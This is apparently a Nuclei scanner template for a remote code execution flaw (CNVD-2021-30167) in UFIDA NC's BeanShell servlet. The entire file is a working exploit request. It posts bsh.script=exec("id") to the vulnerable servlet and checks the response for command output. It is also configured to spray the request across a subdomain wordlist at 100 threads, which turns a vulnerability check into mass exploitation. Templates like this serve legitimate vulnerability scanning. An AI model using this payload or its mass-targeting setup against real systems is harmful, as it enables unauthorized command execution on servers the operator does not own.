id: CNVD-2021-30167 1

info:
  name: UFIDA NC BeanShell Remote Code Execution
  author: pikpikcu
  severity: high
  reference: |
     - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
     - https://www.cnvd.org.cn/webinfo/show/6491
  tags: beanshell,rce,cnvd

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
        Content-Type: application/x-www-form-urlencoded

        bsh.script=exec("id");
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "uid="
          - "Windows IP"
        condition: or

      - type: word
        words:
          - "BeanShell Test Servlet"

      - type: status
        status:
          - 200